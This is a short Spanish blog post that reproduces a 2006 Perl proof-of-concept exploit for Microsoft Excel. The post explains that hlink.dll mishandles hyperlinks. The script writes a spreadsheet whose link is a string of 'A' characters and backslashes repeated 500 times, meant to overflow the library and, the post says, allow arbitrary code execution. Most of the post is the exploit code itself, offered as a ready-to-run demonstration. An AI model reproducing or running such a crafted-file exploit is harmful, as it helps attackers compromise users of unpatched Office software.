Prueba de concepto: MS Excel Remote Code Execution Exploit

En este script en perl, se demuestra donde radica la vulnerabilidad, parece ser que la librería hlink.dll no procesa correctamente los hipervínculos, por lo que un usuario podría crear un link especialmente creado para ejecutar código arbitrario.

En el script de abajo se muestra dicha vulnerabilidad.

###############################

# excelsexywarez.pl

# excel unicode overflow poc

# by kcope in 2006

# thanks to revoguard and alex

###############################

use Spreadsheet::WriteExcel;

my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

$worksheet = $workbook->add_worksheet();

$format = $workbook->add_format();

$format->set_bold();

$format->set_color('red');

$format->set_align('center');

$col = $row = 5;

$worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);

$a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;

$worksheet->write_url(0, 0, "$a", "LINK");

# milw0rm.com [2006-06-18]

Posted on 9:16 p. m. by skarvin and filed under | 0 Comments »

0 comentarios: